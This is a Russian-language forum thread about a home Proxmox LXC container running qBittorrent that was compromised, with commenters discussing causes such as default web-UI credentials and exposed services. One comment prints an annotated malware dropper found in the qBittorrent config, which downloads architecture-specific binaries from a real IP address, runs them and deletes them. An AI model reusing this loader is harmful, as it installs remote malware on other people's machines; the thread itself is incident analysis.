Мой LXC ломанули 0_о

что можно сделать

Гарантии что серв чистый нет, только полная переустановка и работа над ошибками

༼;´༎ຶ ۝ ༎ຶ༽

Прикольно. Есть идеи как могли ломануть?

1. После установки висело где-то день с дефолтными логопасами, пока все настраивал, возможно, что просканировали поддомен и как-то через qBittorrent это сделали

2. ssh bruteforce

3. Proxmox community script для установки qBittorrent уже содержал малварь, а я заметил только когда перетаскивал конфиг на Ansible

Ну и хз как оно еще могло попасть. Притом сервис наверное около года висел после установки. Я даже не замечал какие-то проблем

ssh bruteforce

Парольный вход по ssh не отключен?

Первое. Сутки это очень много

Что за LXC, вот тут пишут, что в Ubuntu отключен парольный вход по умолчанию.

https://forum.proxmox.com/threads/what-is-default-username-in-lxc-ubuntu.118641/

Как бы при установке ключи нужно прописывать.

Зачем тебе ssh в контейнере? pct enter $CTID

просканировали поддомен

Т.е. у тебя торрентокачалка торчит наружу? А если не секрет - зачем так?

ssh от Proxmox торчить наружу, не от контейнера. Но потом поставил CrowdSec и вроде стало банить всех

Я, наверное, не очень правильно описал вариант 1. Там не ssh в LXC с дефолтными логопаса, a qBittorent был с дефолтными логопасами, но как они добавили команду - я хз. Может быть там есть настроки прям в веб морде

Чтобы иметь возможность подключиться к ней с любого места. Хотя я чот слышал что сейчас Tailscale (или как оно там называется) часто используют чтобы не светить наружу

Но сервак домашний, казалось бы кому он интересен!?

Но сервак домашний, казалось бы кому он интересен!?

Боту пофиг что сканировать, адресацию колокейшна или домашние IP, что за неимоверно странный вопрос?

Кроме того, у тебя, наверное, LE туда сделан. Боты парсят новые домены в LE и сразу же после выпуска начинают сканировать свежий домен на предмет портов и опубликованных приложений.

Может быть там есть настроки прям в веб морде

Там есть настройки прямо в веб-морде.

Но сервак домашний

Чтобы иметь возможность подключиться к ней с любого места.

Могу ошибаться, но вроде как раз для подобного впн придумали :)

Нет, не ошибаешься. Это как раз для этого сделано.

если хочется выставить наружу торрентокачалку со слабым паролем, самбу, http прокси и прочие «блага цивилизации» и «удобства» - для этого собственно и существует VPN, это изначально задумывалось как раз для этого.


PS: глядя на предыдущий комментарий оставленый в течении минуты.. дуплетом, да.

звони скорее в полицию, сообщи что произошло проникновение в твой лхс, без твоего согласия

ssh от Proxmox торчить наружу

3.14

...проверки ClamAV?

И как он?

А пакеж echo <base64> | base64 -d? Там, наверняка, обратный шелл, на котором тебя вертели во всех позах.

Сорян за иишницу:

# 1. Определяем архитектуру процессора
__a=$(uname -m)

# 2. Сбрасываем переменные окружения, которые могут помешать выполнению (библиотеки)
unset ld_preload 2>/dev/null
unset ld_library_path 2>/dev/null

# 3. Выбираем URL в зависимости от архитектуры (x86_64, aarch64 или amd64)
[ "$__a" = "x86_64" ]  && __u="http://172.245.159.216/1"
[ "$__a" = "aarch64" ] && __u="http://172.245.159.216/2"
[ "$__a" = "amd64" ]   && __u="http://172.245.159.216/3"

# 4. Генерируем случайное имя файла из 8 символов
__p=$(mktemp -u xxxxxxxx 2>/dev/null | tr -cd 'a-za-z0-9' | cut -c1-8)
[ -n "$__p" ] || __p=$(printf '%08d' "$$" | cut -c1-8)

# 5. Функция для скачивания файла (__d)
# Пробует по очереди: curl, wget, python3, perl (через модуль или напрямую через сокеты)
__d() {
    local ___ur="$1" __hp __h __p __pa
    __hp=$(printf '%s' "$___ur" | sed -e 's|^https?://||;s|/.*||')
    __p=$(printf '%s' "$__hp" | grep -o ':[0-9]*' | tr -d ':')
    __h=$(printf '%s' "$__hp" | sed 's|:.*||')
    __pa=/$(printf '%s' "$___ur" | sed -e 's|https?://[^/]*/?||')
    
    [ -z "$__h" ] && return 1
    
    command -v curl >/dev/null 2>&1 && curl -sso - "$___ur" && return 0
    command -v wget >/dev/null 2>&1 && wget -qo - "$___ur" && return 0
    command -v python3 >/dev/null 2>&1 && python3 -c "..." && return 0
    # ... (далее попытки через perl)
}

# 6. Поиск подходящей директории для записи (где есть права на запись)
# Проверяет /tmp, домашнюю директорию и все точки монтирования
__wd=$(_seen=""; for _m in /tmp ${HOME} ${PWD} $(mount | awk '{print $3}'); do
    # Проверка на дубликаты и возможность записи (touch/rm)
    # ...
    printf '%s ' "$_m"
done)
[ -n "$__wd" ] || __wd=/tmp

# 7. Основной цикл: скачивание, запуск и удаление
for i in $__wd; do
    (__d $__u > $i/$__p) 2>/dev/null && [ -s $i/$__p ] && {
        cd $i
        chmod +x $__p      # Делает файл исполняемым
        ./$__p             # Запускает
        wait $!            # Ждет завершения (или запуска в фоне)
        rm -rf $i/$__p     # Сразу удаляет файл с диска
    } >/dev/null 2>&1
    
    # Проверяет, запущен ли уже процесс, чтобы не дублировать
    grep -qe '^\./[a-za-z0-9]{8}$' /proc/[0-9]*/cmdline 2>/dev/null && break
done

Дату у файла не смотрел? Логи не сохранял?

А пакеж echo | base64 -d? Там, наверняка, обратный шелл, на котором тебя вертели во всех позах.

root@pve:~# echo | base64 -d -bash: синтаксическая ошибка рядом с неожиданным маркером «|»

Что ж.. Каков вопрос — таков ответ.

Можешь описать, как ты себе это представляешь в этом случае? Интересно.

У меня нет опыта в этом и я не понимаю как можно выполнить код через запись в файл в его случае (как в файл записали код, тоже не понимаю).

А, понял, ты считаешь что его сбрутили. Неинтересно тогда.

Пробежал бот, засабмитил в какой-нибудь shodan. И это не запись в файл, это демон с веб-мордой (куда и прописали строчки) висел наружу с дефолтными кредами.

Скорее всего да, сбрутили дефолтные креды.

Ну, ты дурачка-то не валяй, а?! Сам же в ОП заменил реальную строку на <base64>, а тут шлангуешь сделать обратное преобразование…

…проверки ClamAV?

И как он?

Ну, ничего не нашел.

Я чот вообще не понял, что от меня требуется?

/root/.config/qBittorrent/qBittorrent.conf

Proxmox community script

Это они придумали qbittorrent от рута запускать?

qBittorent был с дефолтными логопасами

У него же там по умолчанию что-то нетривиальное должно быть

Это они придумали qbittorrent от рута запускать?

Да, но это внутри LXC root, но таки контейнер создается как unprivileged. Чот сомневаюсь, что внутри контейнеров кто-то морочиться с пользователями

У него же там по умолчанию что-то нетривиальное должно быть

Что?

Install Profiles Port :8090 User admin Pass changeme

Вот ссыль - https://community-scripts.org/scripts/qbittorrent?id=qbittorrent#details

кто-то морочиться с пользователями

я

Вот что я вижу, когда запускаю qbittorrent-nox в lxc от нового пользователя:

nyx@NASctDeb ~> qbittorrent-nox 

*** Официальное уведомление ***
qBittorrent — это программа для обмена файлами. При работе торрента его данные становятся доступны другим пользователям посредством раздачи. Вы несёте персональную ответственность за все данные, которыми делитесь.

Никаких дальнейших уведомлений выводиться не будет.

Нажмите кнопку «Enter» для продолжения…
Веб-интерфейс скоро запустится после внутренней подготовки. Пожалуйста, подождите…

******** Информация ********
Войдите в веб-интерфейс для управления qBittorrent: http://localhost:8080
Имя администратора веб-интерфейса: admin
Пароль администратора веб-интерфейса не был установлен. Для этого сеанса предоставлен временный пароль: uv9uzwQqp
Вы должны задать свой собственный пароль в настройках программы.

uv9uzwQqp - не changeme

Вот ссыль

Скажи им спасибо, что такой пароль ставят

временный пароль

Количество символов всегда 9, так что тоже можно побрутфорсить

Я ставил на оффтоп и на Линь — он как-то странно себя ведёт.

Хз, уже не помню, он у меня около года работал, помню пароль под себя менял и менял не сразу. Если они все же выдают генерируемый пароль для входа в веб-морду, тогда вопросов еще больше как смогли пропихнуть эту штуку =(

У меня только один lxc от них - heimdall. Так что я и не утверждаю, что они этот пароль в кубит не поставили.

висяк им не нужен…

Думаю над VPN для внутренних сервисов

даже не думай, лол. Заблочат. Или поставят ограничение в 16 килобайт. «16 килобайт хватит всем» (с) РКН

Вот тут как бы два стула, с одной стороны VPN снимает головную боль со всякими сканерами и доступом третьих лиц. С другой стороны доступ и у меня может отвалиться. А я часто бываю в тысячах километрах от сервера и просто так туда не залезть =(

Отсыпь юникодных смайлов